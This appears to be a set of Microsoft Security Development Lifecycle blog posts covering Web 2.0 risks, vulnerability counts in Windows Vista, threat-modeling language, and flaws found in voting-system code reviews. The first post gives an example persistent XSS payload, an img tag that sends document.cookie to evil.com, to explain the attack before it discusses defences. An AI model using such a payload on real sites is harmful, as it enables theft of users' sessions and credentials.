Hi everyone, Bryan Sullivan here.
Unless you’ve been living in an ice cave on the polar cap for the last month, you’ve heard about Microsoft’s proposed acquisition of Yahoo. George Hulme of InformationWeek wrote a very insightful column about the proposed acquisition and what it would mean for Yahoo’s Web 2.0 properties. My favorite quote from this column (probably my favorite quote from anyone’s column so far this year): “…there’s still much to do in the [software] industry to reach a level of truly sustainable computing. This is perhaps especially true in the nascent area of Web 2.0 development. Let’s hope Microsoft brings its Trustworthy Computing Initiative, or more precisely its Security Development Lifecycle to Yahoo, should the $45 billion deal come through.” That’s pretty high praise for the SDL, but what exactly does the SDL have to say about Web 2.0 development? To answer this question, let’s take a look at a couple of security issues that affect Web 2.0 applications and then dive into the corresponding SDL requirements.
Many Web 2.0 applications allow their end users to build and contribute to the application. Think about social networking sites like Facebook, or wikis like Wikipedia. The content on sites like these comes directly from the users themselves. (Remember that you were Time Magazine’s Person of the Year in 2006 for this very reason!) While this is very empowering for users, it does beg the question: If users can add their own content to a web site, what’s to prevent them from adding malicious content? Consider what would happen if Evil Eve adds the following HTML to a wiki entry:
<img src=“http://www.evil.com/eve?“ + document.cookie/>
If the wiki accepts this content from Eve, then anyone who looks at the wiki entry will have their browser cookie “stolen” and sent to Eve at evil.com. The cookie could potentially contain login credentials or other sensitive information, allowing Eve to impersonate her victim and essentially commit a form of identity theft.
The attack I’ve shown here is known as a persistent Cross-Site Scripting (XSS) attack, and is the most dangerous form of XSS since it doesn’t require any social engineering like reflective and DOM-based XSS attacks do. The victim doesn’t have to do anything unusual – he just has to browse to an infected page, maybe even one he’s been to hundreds of times in the past. And in all likelihood, he’ll never even know he was a victim. The Samy worm which infected MySpace in late 2005 exploited a persistent XSS vulnerability to silently spread through its victims’ profile pages. Within less than a day after its release, Samy had spread to over one million MySpace users, forcing MySpace to completely shut down its site while they diagnosed and fixed the vulnerability.
(As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies. However, HttpOnly is just a defense-in-depth measure and not a complete solution for the inherent problem of end users being able to write malicious code into the web site.)
Web mashups are another popular component of Web 2.0. JavaScript’s Same Origin Policy prevents web developers from writing client-based mashups (that is, mashups that don’t use a server proxy to request data from the individual sites being “mashed” together) in straight DHTML. Some Rich Internet Application (RIA) frameworks, notably Adobe’s Flash and Microsoft’s Silverlight, offer mechanisms to bypass the Same Origin Policy. For Flash, this mechanism is an XML file (crossdomain.xml) hosted on the domain root that lists all the external domains that should be granted access to the Flash movie. For example, if you host a Flash movie at www.mysite.com, and want to allow access from www.friendlysite.com, you would create a file www.mysite.com/crossdomain.xml with content as follows:
<cross-domain-policy>
<allow-access-from domain=”www.friendlysite.com”/>
</cross-domain-policy>
So far, so good. However, crossdomain.xml allows not just specific domain names in the allow-access-from element (ie “www.friendlysite.com”) but also wildcards (“*.friendlysite.com”). In fact, it will even allow wildcards that break the two-dots rule like “*.com” or even just “*”. By using highly permissive access lists like this, a developer is essentially letting anyone on the internet manipulate his objects and data. In an attack very reminiscent of the Samy worm, Chris Shiflett exploited an allow-access-from-* entry in Flickr’s crossdomain.xml file that caused any visitor to Chris’s web site to automatically add Chris to their Flickr friends list. While this may not be the scariest attack you’ve ever heard of, imagine what might happen if a truly malicious user discovers the same vulnerability in the fund transfer functionality of a bank’s web site, or the security trading functionality of a brokerage firm’s web site.
So, what does the SDL have to say about these issues? In terms of XSS prevention, the SDL offers a lot of guidance. The SDL requires the use of both input validation (making sure that user input conforms to a known good format – in the case of the wiki entry, to deny HTML and script content) and output encoding (making sure that any active content that gets past the input validation routines is rendered as harmless text and not executed). Internally, we also mandate the use of code analysis tools to find XSS vulnerabilities that might otherwise slip through the cracks. This is great advice for anyone developing web applications, whether they’re Web 2.0 or 1.0.
As for cross-domain policy files, the SDL provides several recommendations. First is a simple attack surface reduction: if a site is not meant to be accessed by foreign domains, then any cross-domain policy files should be removed from the site. Second, if an application offers cross-domain access and also has functionality available only to authenticated users, then this site must not contain overly permissive access lists like “*” or “*.com”. It’s best to list specific domains wherever possible, or at least follow the same two-dots rule that HTTP cookies have to follow for their domain specifications. This helps to limit the sites that can perform request forgery attacks like the Flickr attack mentioned earlier. If no applications anywhere on the site offer special functionality for authenticated users, then the SDL does permit the site to have a broad-reaching cross-domain access list. However, this does require constant oversight to ensure that no authenticated applications are added to the site at a later time. In my opinion, it’s safer just to lock down the list to exactly the sites that are necessary and no more.
Regardless of what happens between Microsoft and Yahoo, I agree with George that adoption of the SDL would benefit Yahoo’s Web 2.0 applications. In fact, I’ll take it a step further and state that adoption of the SDL would benefit anyone’s Web 2.0 applications. In my next SDL blog post, I’ll be addressing the trickiest aspect of implementing the SDL for Web 2.0: developing the “perpetual beta”.
Hi, Michael here.
I am always bemused when Jeff Jones performs in-depth security vulnerability analysis and reports his findings, not because of the content of his findings, but because of the incredible arm-chair commentary that follows.
Jeff and I have seen and heard it all:
You get the picture. I could keep going, but I have a blog post to write!
So let's ignore raw stats for a moment, let's not compare RedHat to Mac OSX to Ubuntu to Windows Vista, because let's face it, no-one can agree on any measurement of security without getting knotted up. So let's just ignore the comparison stuff. Measuring security is a real challenge, and while we may debate the merits of vulnerability counts, right now it's the only concrete metric we have.
When Bill Gates released his Trustworthy Computing Memo in 2002, many people thought it was just a marketing stunt. It was not a marketing stunt: BillG edicts are always taken very seriously inside Microsoft. In fact, I will go one step further; the only way you make big changes in a large software company is when the boss says you have to do so. So why did Bill send the memo to all Microsoft employees? It was simple, he (and the entire senior management team for that matter) recognized Microsoft faced a problem that needed solving; the company needed to shore up the security of its products. So Bill sent his memo to get the ball rolling.
Now let's go back to Jeff's recent analysis. Cover up the Mac OS X and Linux stats for a moment so you can only see the Windows XP SP2 and Windows Vista bars. Windows Vista has had fewer security vulnerabilities than Windows XP SP2. Conventional wisdom (which is often wrong, especially when it becomes urban legend) tends to suggest that the more lines of code you have the more bugs you have. That might very well be true, and Windows Vista is certainly larger than Windows XP SP2; yet right now, we are on track for an approximately 50% reduction in vulnerabilities compared to Windows XP SP2. Think about that figure for a moment: about a 50% reduction (and that does not account for the reduction in vulnerability severity) despite the increase in code size.
So if Windows Vista has more code than Windows XP SP2, why are we seeing a reduction in vulnerabilities? Simple: the SDL! Microsoft decided to change its development practices to enforce greater security discipline. The only way you reduce security vulnerabilities is by focusing on improving code security, design security, reducing attack surface, education, tracking evolving threats, mandatory use of tools, banning known bad functionality, better compilers, better linkers, better libraries etc etc. And that is what the SDL is all about and what our team is laser-focused on.
The reason you're seeing a reduction in vulnerabilities across major Microsoft products is simple:
You improve security by focusing on security. Not by wishing on a star. Not by believing age-old myths about "given enough eyeballs.... blah blah." If the "eyeballs" mantra were true, we'd have very few open source security bugs. But there are plenty of open source security bugs found after products ship. Hmmm, this would seem to raise some interesting question on the validity of the "enough eyeballs" belief given these hard facts.
Now let's go back to Jeff's chart for a moment. Cover the Windows columns and look at the other columns. However you want to skew or spin it, that's a lot of security vulnerabilities that needed fixing once a product had shipped. Admit it. Come on; admit it, that's a lot of bugs. I don't care how big a Linux distro is, or how many IM clients Ubuntu ships with, or the merits of UAC vs su. That's a lot of security vulnerabilities!
Now ask yourself this question - how many people involved in the development of these other products have you heard say, "Wow, we have a lot of security bugs, we really should do something systematic to fix this problem." I'll be very happy to be proved wrong, but all I hear is crickets. I see no-one else in the industry standing up and saying, "Let's fix this."
I just hear emotion, excuses and dogma.
At Microsoft, BillG's memo was a "we need to fix this" memo, and we are now seeing results, but not perfection. There will be no perfection, because no software is 100 percent secure, but progress is being made across all Microsoft products, not just Windows, because of the SDL.
Let me close with a story. A few years ago I spoke to some senior technical people from a large financial organization about software security. After visiting Microsoft they were off to visit another operating system vendor. I won't name names. The financial company was very interested in our early results, and they were encouraged by what they saw because of the SDL. I asked the most senior guy in the room to ask the other company one very simple question, "What are they doing to improve the security of their product? And by that I mean, what are they doing to reduce the chance security vulnerabilities will creep into the product in the first place? And they cannot use the word ‘Microsoft' in the reply." Two weeks later, the guy phoned me and said his company would buy Microsoft products and nothing from the other company. I asked him why. He said because all they could do was make up excuses (see the list at the start for examples!) rather than admit to having numerous critical security vulnerabilities and no process to reduce their ingress.
Ok, one more comment! I would love to see others in the industry stand up and admit there is a problem that needs solving and start doing something about it. I really, really would, because we need to secure the entire computing ecosystem. Comparing numbers is interesting, but what really matters is this: is progress being made? At Microsoft the answer is "yes" but only because BillG realized there was a problem to be solved and that is what led to the birth of the SDL.
One of the critiques of the threat modeling blog posts process is that it can seem interminable. And so, in this final post, I’d like to offer up some final thoughts on language, and cognitive load.
Specification versus Analysis
When Larry Osterman was writing about threat modeling, he casually tossed out:
A threat model is a specification, just like your functional specification (a Program Management spec that defines the functional requirements of your component), your design specification (a development spec that defines the architecture that is required to implement the functional specification), and your test plan (a test spec that defines how you plan on ensuring that the design as implemented meets the requirements of the functional specification). Just like the functional, design and test specs, a threat model is a living document - as you change the design, you need to go back and update your threat model to see if any new threats have arisen since you started.
A threat model is a specification, just like your functional specification (a Program Management spec that defines the functional requirements of your component), your design specification (a development spec that defines the architecture that is required to implement the functional specification), and your test plan (a test spec that defines how you plan on ensuring that the design as implemented meets the requirements of the functional specification).
Just like the functional, design and test specs, a threat model is a living document - as you change the design, you need to go back and update your threat model to see if any new threats have arisen since you started.
I found this pretty surprising. I think of threat modeling as an analysis technique, but hey, if test plans are specs, threat models aren’t that different. (It took some private back and forth with Larry to convince me.) This brings me to the topic of what words we use to describe things.
On language
[The English language] becomes ugly and inaccurate because our thoughts are foolish, but the slovenliness of our language makes it easier for us to have foolish thoughts. The point is that the process is reversible. Modern English, especially written English, is full of bad habits which spread by imitation and which can be avoided if one is willing to take the necessary trouble. If one gets rid of these habits one can think more clearly, and to think clearly is a necessary first step toward political regeneration: so that the fight against bad English is not frivolous and is not the exclusive concern of professional writers. (George Orwell, Politics and the English Language.)
We ask people to threat model (as part of the SDL) by threat modeling their application. To do that, they model the design, and then have a threat modeling meeting in which someone runs the threat modeling tool to produce a threat modeling document. In our particular case, I’m not sure it’s easily avoided.
“We ask people to analyze their designs (as part of the SDL). To do that, they diagram the design, then have a threat modeling meeting in which someone runs the codename tool to produce a threat modeling document.”
In fact, I’ve worked hard to reduce jargon in the process, but at one point, went too far. I tried to convince people to say “diagram” instead of DFD, and they revolted. Actually, they didn’t really revolt, but they did refuse to go along. Experienced threat modelers actually felt that the term DFD was more clear than saying ‘diagram,’ because DFD includes a specification of what kind of diagram, and they had already integrated the acronym into their thinking. Having integrated it, they could use it without thinking about it. Well, as Adam Barr points out, “you can pick your friends, and you can pick your nose, but you can't pick your online community's lexicon.”
It didn’t add to their cognitive load to say “DFD.”
Cognitive Load
People can only handle so much new information at one time. Learning to drive a stick shift is harder than learning on an automatic, because there’s a whole set of tasks you can ignore while the automatic transmission handles them for you. In my approach, this relates pretty closely to the concept of flow. If you’re so focused on rules and jargon, you can’t focus on what you should be building. Cool, well-designed features to help your customers.
In Conclusion
We started this series by looking at the trouble with threat modeling. How people had trouble getting started, relating the process to their other work, or validating what they’d done. We’ve looked at the new threat modeling process, and the steps involved. We talked about how to get into the flow with threat modeling. How clear goals, direct and immediate feedback, and balancing ability and challenges set people up to focus their attention and succeed. We’ve talked a bit about making threat modeling work better by adding structure to chaos, and how to use self-checks and rules of thumb to give people confidence they’re on the right trail. We’ve talked a very little bit about how to customize the process for your own needs, and where that customization can be dangerous.
All of this has come out of looking at our threat modeling activity as a human activity, and asking how we can best shape it to help people get to the results that we want. I hope that our readers have enjoyed the series, which we’ve converted into a downloadable document (here.)
Hi folks, Eric Bidstrup here.
We interrupt our regular schedule of blog postings to offer this special post for “Super Tuesday” given the subject matter. Hope you enjoy…
This year is a presidential election year in the United States. Selecting a new president is perhaps the ultimate example of the importance of having a trustworthy election process. There have been some well chronicled examples of elections with extremely close results, where the winner’s margin of victory was perhaps smaller than the election system’s margin of error. The term “Hanging Chads,” from the 2000 U.S Presidential election, is now part of the American vocabulary, and locally here in Washington State our last gubernatorial election in 2004 required 3 recounts with the final winner being determined by a margin of only 129 votes, or 0.0045% of the popular vote.
The populace demands confidence that, even in close elections, the election result accurately reflects the voters’ intent. In theory, such precision can be improved by using computers and technology.
However, it seems that every recent election season brings stories in the media about security concerns regarding voting machine (and their software) security. A recent New York Times article provides a good overview of voting machine security concerns; and academic studies on voting systems last year in California, Connecticut, Florida, and Ohio provide some interesting insights about security concerns and vulnerabilities in voting systems from several vendors.
These analyses are fascinating to us, because they offer an opportunity to see how a set of experts look at products other than ours. Applied security researchers often analyze our products, and often share their processes and tools with us, but it’s rare to see a top-to-bottom product review released. In California, there was both white and black box testing done by different teams, and we’ve studied these reports to see the perceptions of development practices from other vendors and results of a different type of review process.
Something my colleagues and I find very interesting is that many of the vulnerabilities noted in these reports could have been prevented by following the requirements in Microsoft’s Security Development Lifecycle. The studies performed in California (prepared at UC Berkeley but created by teams of academics from across the United States) included detailed source code analysis. I’ll select out a few examples from those studies and describe them here. (Note: I’m deliberately picking a few examples from each vendor assessed in the study. I am not attempting to criticize any specific vendor, but rather am trying to illustrate examples of areas where application of the SDL could help contribute towards society’s need for trustworthy computing in a very visible and important application.)
Let’s start with the Source Code Review of the Sequoia Voting System. Two examples from the executive summary are interesting:
“Cryptography. …Many cryptographic functions are implemented incorrectly, based on weak algorithms with known flaws, or used in an ineffective or insecure manner. Of particular concern is the fact that virtually all cryptographic key material is permanently hardcoded in the system (and is apparently identical in all Sequoia hardware shipped to different jurisdictions)…
Software Engineering. …The software suffers from numerous programming errors, many of which have a high potential to introduce or exacerbate security weaknesses. These include buffer overflows, format string vulnerabilities, and type mismatch errors….”
A deeper reading of the cryptographic concerns (page 29 in report) notes concerns (amongst others) over the use of a flawed implementation of the SHA hash algorithm and use of the Data Encryption Standard (DES) algorithm. The SDL has specific policies outlining appropriate selection of cryptographic algorithms. For example, DES is prohibited except for backwards compatibility. SDL also requires that applications use operating system cryptographic functions and libraries. The cryptography team in the operating systems group is supported by world-class cryptographers who carefully scrutinize the implementation of crypto algorithms, and additionally these operating system functions are formally reviewed and certified by the National Institute of Standards and Technology (NIST) Cryptographic Module Validation Program (CMVP) who validates cryptographic modules meet Federal Information Processing Standards (FIPS). Most application developers are not cryptographers and hence are unlikely to encode crypto algorithms correctly. The SDL requires the use of standard crypto functions and outlines requirements on algorithm selection, key length and key management.
Moving to the software engineering concerns; while several common coding and design concerns are noted (e.g. input validation) I want to select one with a bit more subtlety: running code from USB sticks (page 37 in report). From the report, it appears the code present on the USB sticks is used to program a component (HAAT) of their client (WinEDS) to prepare for a specific election. The valid concern noted by the study is that USB sticks used by WinEDS to configure the HAAT are implicitly trusted to have appropriate authorization to program the voting devices for an election, and that a formal authorization framework didn’t appear to be present. The implication being (as stated in the report): “If such a stick is used in a HAAT that has been compromised by an attacker, or an attacker can provide a maliciously modified USB stick in place of a legitimate one, the attacker could surreptitiously take complete control over the WinEDS client”. Basically, this is a potential “rootkit” for election systems. A threat model, a fundamental design requirement of the SDL, could help uncover such design issues and illustrate the need for mitigations.
Now, let’s turn to the Source Code Review of the Hart InterCivic Voting System. I’ll try to keep my commentary balanced by selecting two examples here as well:
From the executive summary:
“Unsecured network interfaces … Voters can connect to unsecured network links in a polling place to subvert eSlates, as well as to eavesdrop on cast votes and to inject new votes. Poll workers can connect to JBCs or eScans over the management interfaces and perform back-office functions such as modifying the device software. The impact of this is that a malicious voter could potentially take over one or more eSlates in a precinct and a malicious poll worker could potentially take over all the devices in a precinct. …
Failure to protect ballot secrecy Hart’s system fails to adequately protect ballot secrecy...”
The concerns about unsecured network interfaces are discussed in the context of authentication and least privilege (pages 24-25). While that is certainly a reasonable perspective, with the SDL we take a broader view and require all teams to threat model the attack surface of the software being developed. Attack surface is the enumeration of all possible entry points that an attacker could use to compromise software (code listening to network interfaces, code that accepts data from external sources, etc). The SDL requires development teams to both minimize attack surface in the software they are building and to consider attacks from each entry point on the attack surface to ensure that mitigations are present. It would appear that these examples show that the development teams didn’t adopt such a systematic approach, or failed to think about mitigations of each possible attack if they did.
Ballot secrecy is an example where security and privacy concerns intersect. Many people confuse security and privacy, and both are fundamental to trust. Privacy addresses a wide variety of concerns about many types of data (such as Personally Identifiable Data (PII), ballot data, etc.), how it’s handled (gathered, transmitted, stored, and disposed of) and what rights and expectations different stakeholders may have regarding that data. (Tina Knutson gave a great overview on these issues in a previous blog posting “Privacy is not just about data security“). Security provides the mechanisms, policies, and practices to enforce privacy requirements. Given the intertwined nature of these issues, both are addressed in the SDL.
The concerns about vote storage (section 6.8, page 58 of report) review some classic challenges in software security and privacy with weak random number generation. Randomization is important here since it controls how votes are stored in memory, and weak randomization enables someone to reverse engineer how individual voters voted by examining the aggregate tally of votes (which can be found on the Mobile Ballot Boxes “MBB”) in conjunction with the audit log. The MBB has mitigations in place to protect integrity (tampering) of votes, but doesn’t appear to protect against information disclosure. The SDL cryptographic policies also cover correct random number generation. The challenge of fully considering all ways in which data can be reverse engineered, contextualized (order of log entries providing information that can be linked to individuals’ choices), and correlated with other data sources is a growing challenge. In the SDL privacy policies, we call attention to these issues, but it’s still a challenge.
Next, let’s look at the Source Code Review of the Diebold Voting System. Again, I’ll pick two subjects.
“Vulnerability to malicious software: The Diebold software contains vulnerabilities that could allow an attacker to install malicious software on voting machines or on the election management system…
Vulnerability to malicious insiders: The Diebold system lacks adequate controls to ensure that county workers with access to the GEMS central election management system do not exceed their authority….”
Let’s look at the “Malicious Software” first: While there’s a lot of discussion of general concerns with viruses and malicious payloads, I’d like to drill down on a specific case noted in section 4.2.3 (page 29). The typical concerns around string handling in C/C++ and buffer overflows are mentioned. What is interesting is that in many places this system uses the Microsoft Foundation Classes (MFC) CString class to help mitigate such concerns. The problem noted is that this practice is not consistently followed, and in fact there is a case of one specific function making calls to both CString *and* a standard C string library, in the same function. So here it appears the engineering team had the right idea by trying to remove calls to potentially risky C string library functions (just as required in SDL), but they just weren’t able to consistently and completely apply it.
Regarding the executive summary concern about malicious insiders, I’m inclined to attribute it to what’s described in section 4.3 on page 30: “No formal threat model or security plan” and “No formal security training”. Both of these are pivotal elements in the SDL. Several comments are offered to the effect that “security measures that are in place appeared to be ad hoc”, and “When new developers arrive at the company, they do not receive any kind of security training”. We’ve blogged here in the past about the importance of both areas, so I won’t repeat that again. (See Adam’s Threat Modeling series and Dave’s “Security Education v. Security Training” posts respectively for more info).
Is the SDL enough to ensure trustworthy voting systems?
When I offered this blog post for the review of my colleagues, it generated some very interesting discussion. Some of my colleagues were worried that I would misrepresent the SDL as a panacea for creating perfectly trustworthy voting systems. Let me be clear: this is absolutely NOT the case. While the SDL could help mitigate repeating many of the problems identified in these studies, it’s worth noting that election systems have a number of unusual and unique requirements. For example, voters cannot review their voting records as they would their banking records to ensure that no fraud has been committed – since the ability to do so would typically enable vote-selling and coercion. Alternate techniques are therefore required to allow voters to verify that their votes have been properly counted. Such requirements force the adoption of “extraordinary” techniques that go beyond those of secure software engineering. Furthermore, the expectations of society on the trustworthiness of voting systems are much greater as compared to other types of software (for example: the latest XBOX game title). I’ll further explore differences in how different people think about “degrees of trustworthiness” (aka “assurance” or “robustness”) in a future posting.
Summary
Let me wrap by saying this, building secure software is difficult. Prior to the advent of Trustworthy Computing and the Security Development Lifecycle here at Microsoft, I’d bet that many of the issues noted in these reports would have applied to earlier Microsoft products too. Some might think I’m throwing stones while living in a glass house, but that is not my intent. While Microsoft products are not vulnerability free, we continue to systematically analyze the sources of vulnerabilities in our software. We continue to modify our engineering practices and tools to better identify potential vulnerabilities and mitigate them before software is released. With increasing awareness and concerns over the trustworthiness of computers in general, the entire industry needs to improve. Given the importance of how we choose to organize ourselves as a society and elect representatives to govern us, voting systems are a great place to step up both in the context of the computing industry, and to better serve society.
I believe many of the issues found in these voting systems would not have entered the system if the SDL was used to design and build the voting systems.